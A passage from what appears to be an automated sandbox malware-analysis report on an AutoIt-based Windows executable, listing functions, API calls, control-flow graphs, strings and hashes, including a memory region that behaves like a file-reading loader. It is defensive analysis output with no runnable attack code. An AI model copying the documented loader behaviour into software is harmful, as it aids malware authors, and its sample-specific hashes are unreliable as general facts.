                                                                                                                                                                  • Opcode ID: 2112c1e712c7154db348cf237cb694e9496d7972318c7e1e197a035869c5647c
                                                                                                                                                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2112c1e712c7154db348cf237cb694e9496d7972318c7e1e197a035869c5647c
                                                                                                                                                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                                                                                                  Function 00401F20 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 214COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                                                                                  • API String ID: 514040917-1609664196
                                                                                                                                                                  • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                                                                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                                                                  • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                                                                                  Function 0041DA15 Relevance: 12.5, APIs: 8, Instructions: 500COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: dc7fee0ee8d79b611645c3cf16b22df94302afaeb9d6cf75eaf0d48d8dfc2926
                                                                                                                                                                  • Instruction ID: 1555620249d9bca8109bc9dac4b4fb45b2a7888f9a4ed29ad5b0dea482c9f251
                                                                                                                                                                  • Opcode Fuzzy Hash: dc7fee0ee8d79b611645c3cf16b22df94302afaeb9d6cf75eaf0d48d8dfc2926
                                                                                                                                                                  • Instruction Fuzzy Hash: 1412D5B0E043859FDB259F68C8847FE7BF0AF06304F14459AE4528B292D37C99C2CB5A
                                                                                                                                                                  Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2237 401100-401111 2238 401113-401119 2237->2238 2239 401179-401180 2237->2239 2240 401144-40114a 2238->2240 2241 40111b-40111e 2238->2241 2239->2238 2242 401182 2239->2242 2244 401184-40118e call 401250 2240->2244 2245 40114c-40114f 2240->2245 2241->2240 2243 401120-401126 2241->2243 2246 40112c-401141 DefWindowProcW 2242->2246 2243->2246 2247 42b038-42b03f 2243->2247 2256 401193-40119a 2244->2256 2248 401151-401157 2245->2248 2249 40119d 2245->2249 2247->2246 2255 42b045-42b059 call 401000 call 40e0c0 2247->2255 2253 401219-40121f 2248->2253 2254 40115d 2248->2254 2251 4011a3-4011a9 2249->2251 2252 42afb4-42afc5 call 40f190 2249->2252 2251->2243 2257 4011af 2251->2257 2252->2256 2253->2243 2260 401225-42b06d call 468b0e 2253->2260 2258 401163-401166 2254->2258 2259 42b01d-42b024 2254->2259 2255->2246 2257->2243 2263 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2257->2263 2264 4011db-401202 SetTimer RegisterWindowMessageW 2257->2264 2266 42afe9-42b018 call 40f190 call 401a50 2258->2266 2267 40116c-401172 2258->2267 2259->2246 2265 42b02a-42b033 call 4370f4 2259->2265 2260->2256 2264->2256 2274 401204-401216 CreatePopupMenu 2264->2274 2265->2246 2266->2246 2267->2243 2276 401174-42afde call 45fd57 2267->2276 2276->2246 2288 42afe4 2276->2288 2288->2256
                                                                                                                                                                  APIs
                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                                                  • API String ID: 129472671-2362178303
                                                                                                                                                                  • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                                  • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                                                                                  Function 044025F8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2289 44025f8-44026a6 call 4400048 2292 44026ad-44026d3 call 4403508 CreateFileW 2289->2292 2295 44026d5 2292->2295 2296 44026da-44026ea 2292->2296 2297 4402825-4402829 2295->2297 2303 44026f1-440270b VirtualAlloc 2296->2303 2304 44026ec 2296->2304 2298 440286b-440286e 2297->2298 2299 440282b-440282f 2297->2299 2305 4402871-4402878 2298->2305 2301 4402831-4402834 2299->2301 2302 440283b-440283f 2299->2302 2301->2302 2306 4402841-440284b 2302->2306 2307 440284f-4402853 2302->2307 2308 4402712-4402729 ReadFile 2303->2308 2309 440270d 2303->2309 2304->2297 2310 440287a-4402885 2305->2310 2311 44028cd-44028e2 2305->2311 2306->2307 2314 4402863 2307->2314 2315 4402855-440285f 2307->2315 2316 4402730-4402770 VirtualAlloc 2308->2316 2317 440272b 2308->2317 2309->2297 2318 4402887 2310->2318 2319 4402889-4402895 2310->2319 2312 44028f2-44028fa 2311->2312 2313 44028e4-44028ef VirtualFree 2311->2313 2313->2312 2314->2298 2315->2314 2322 4402772 2316->2322 2323 4402777-4402792 call 4403758 2316->2323 2317->2297 2318->2311 2320 4402897-44028a7 2319->2320 2321 44028a9-44028b5 2319->2321 2324 44028cb 2320->2324 2325 44028c2-44028c8 2321->2325 2326 44028b7-44028c0 2321->2326 2322->2297 2329 440279d-44027a7 2323->2329 2324->2305 2325->2324 2326->2324 2330 44027a9-44027d8 call 4403758 2329->2330 2331 44027da-44027ee call 4403568 2329->2331 2330->2329 2337 44027f0 2331->2337 2338 44027f2-44027f6 2331->2338 2337->2297 2339 4402802-4402806 2338->2339 2340 44027f8-44027fc CloseHandle 2338->2340 2341 4402816-440281f 2339->2341 2342 4402808-4402813 VirtualFree 2339->2342 2340->2339 2341->2292 2341->2297 2342->2341
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 044026C9
                                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 044028EF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFileFreeVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 204039940-0
                                                                                                                                                                  • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                                                                                                                  • Instruction ID: 64d2f91ecfa9242be2480a4d54404bf3ef4c32dd7e4162b96ae4269cf5147ffe
                                                                                                                                                                  • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                                                                                                                  • Instruction Fuzzy Hash: EAA10B75E00209EBDF24CFA4C898BAEB7B5BF48304F1085A9E501BB2C0D7B5AE55DB50
                                                                                                                                                                  Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2343 401250-40125c 2344 401262-401293 call 412f40 call 401b80 2343->2344 2345 4012e8-4012ed 2343->2345 2350 4012d1-4012e2 KillTimer SetTimer 2344->2350 2351 401295-4012b5 2344->2351 2350->2345 2352 4012bb-4012bf 2351->2352 2353 4272ec-4272f2 2351->2353 2354 4012c5-4012cb 2352->2354 2355 42733f-427346 2352->2355 2356 4272f4-427315 Shell_NotifyIconW 2353->2356 2357 42731a-42733a Shell_NotifyIconW 2353->2357 2354->2350 2358 427393-4273b4 Shell_NotifyIconW 2354->2358 2359 427348-427369 Shell_NotifyIconW 2355->2359 2360 42736e-42738e Shell_NotifyIconW 2355->2360 2356->2350 2357->2350 2358->2350 2359->2350 2360->2350
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                                                                  • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconNotifyShell_$Timer$Kill
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3970887597-0
                                                                                                                                                                  • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                                                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                                                                  Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2361 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2364 427190-4271ae RegQueryValueExW 2361->2364 2365 40e4eb-40e4f0 2361->2365 2366 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2364->2366 2367 42721a-42722a RegCloseKey 2364->2367 2372 427210-427219 call 436508 2366->2372 2373 4271f7-42720e call 402160 2366->2373 2372->2367 2373->2372
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                                                                  • Opcode ID: 906690bb38058ea6333b0ba06a20dd5c88953ad756bc424b533cc5dd20346e93
                                                                                                                                                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 906690bb38058ea6333b0ba06a20dd5c88953ad756bc424b533cc5dd20346e93
                                                                                                                                                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                                                                                  Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2378 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                                                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                                                                  Function 044023F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2379 44023f8-44024f0 call 4400048 call 44022e8 CreateFileW 2386 44024f2 2379->2386 2387 44024f7-4402507 2379->2387 2388 44025a7-44025ac 2386->2388 2390 4402509 2387->2390 2391 440250e-4402528 VirtualAlloc 2387->2391 2390->2388 2392 440252a 2391->2392 2393 440252c-4402543 ReadFile 2391->2393 2392->2388 2394 4402545 2393->2394 2395 4402547-4402581 call 4402328 call 44012e8 2393->2395 2394->2388 2400 4402583-4402598 call 4402378 2395->2400 2401 440259d-44025a5 ExitProcess 2395->2401 2400->2401 2401->2388
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 044022E8: Sleep.KERNELBASE(000001F4), ref: 044022F9
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 044024E6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFileSleep
                                                                                                                                                                  • String ID: 1MS8UU027Q
                                                                                                                                                                  • API String ID: 2694422964-4233931718
                                                                                                                                                                  • Opcode ID: 2151b27858c7c5cc53c6fa494e1f73d8dc552efb7ece163b404d18962edf94eb
                                                                                                                                                                  • Instruction ID: e08f82bc87250bbaf2062abc5ed9cc3c3e8e1d34e1414d34d7545dd17068263e
                                                                                                                                                                  • Opcode Fuzzy Hash: 2151b27858c7c5cc53c6fa494e1f73d8dc552efb7ece163b404d18962edf94eb
                                                                                                                                                                  • Instruction Fuzzy Hash: 0B515331D04219EBEF11DBA4C819BEFB778AF49300F0085A9E619B72C0DBB55B45CBA5
                                                                                                                                                                  Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2403 40f250-40f26f RegOpenKeyExW 2404 425e17-425e1c 2403->2404 2405 40f275-40f296 RegQueryValueExW 2403->2405 2406 40f2c3-40f2d6 RegCloseKey 2405->2406 2407 40f298-40f2a3 2405->2407 2408 40f2a9-40f2c2 RegCloseKey 2407->2408 2409 425e1d-425e1f 2407->2409
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                                                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$OpenQueryValue
                                                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                                                  • API String ID: 1607946009-824357125
                                                                                                                                                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                                                                  Function 044012E8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
